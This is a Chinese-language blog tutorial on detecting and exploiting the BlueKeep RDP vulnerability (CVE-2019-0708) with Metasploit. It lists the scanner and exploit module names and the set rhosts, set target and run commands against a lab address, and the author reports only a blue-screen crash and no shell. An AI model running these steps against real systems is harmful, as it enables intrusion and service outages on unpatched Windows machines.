Metasploit CVE-2019-0708漏洞检测及利用-泓源视野

Metasploit CVE-2019-0708漏洞检测及利用

一、漏洞简介

Windows系列服务器于2019年5月15号, 被爆出高危漏洞, 该漏洞影响范围较广, windows 2003、windows 2008、windows 2008R 2、windowsxp等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389, RDP协议进行攻击的。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证, 不用任何的交互, 直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。这个漏洞是今年来说危害严重性最大的漏洞,换句话说,该漏洞是“可传播的”,这意味着任何利用该漏洞的恶意软件都可能从受影响的计算机传播到受影响的计算机,就像2017年Wanna Cry恶意软件在全球蔓延一样, 跟之前的勒索,永恒之蓝病毒差不多。

 

二、漏洞检测

1、打开Metasploit,搜索CVE-2019-0708

Metasploit CVE-2019-0708漏洞检测及利用插图

2、选择auxiliary/scanner/rdp/cve_2019_0708_bluekeep,检测漏洞是否存在

3、查看需要设置的参数show options

Metasploit CVE-2019-0708漏洞检测及利用插图1

4、设置目标主机ip set rhosts 192.168.1.129

5、run,检测出现The target is vulnerable,目标很脆弱,说明存在漏洞

Metasploit CVE-2019-0708漏洞检测及利用插图2

 

三、漏洞利用

1、选择攻击模块exploit/windows/rdp/cve_2019_0708_bluekeep_rce

2、查看攻击目标的环境show targets

Metasploit CVE-2019-0708漏洞检测及利用插图3

3、设置模块需要的环境 set target 5

4、查看模块需要的参数 show options

Metasploit CVE-2019-0708漏洞检测及利用插图4

5、设置攻击目标ip set rhosts 192.168.1.129

6、run,攻击

Metasploit CVE-2019-0708漏洞检测及利用插图5

 

7、目标主机出现蓝屏

Metasploit CVE-2019-0708漏洞检测及利用插图6

总结,理论上应该就取得了目标主机的shell,但是我的却是蓝屏,网上有的说多试几次就好,有的说是设置的target问题,都试过了,但是我最终还是没能成功。。。。

禁止非法,后果自负

欢迎关注公众号:泓源视野网络安全

Metasploit CVE-2019-0708漏洞检测及利用插图7

泓源视野网络安全,微信公众号

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
14

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8237897 位访客, 您的IP是:[3.236.86.184]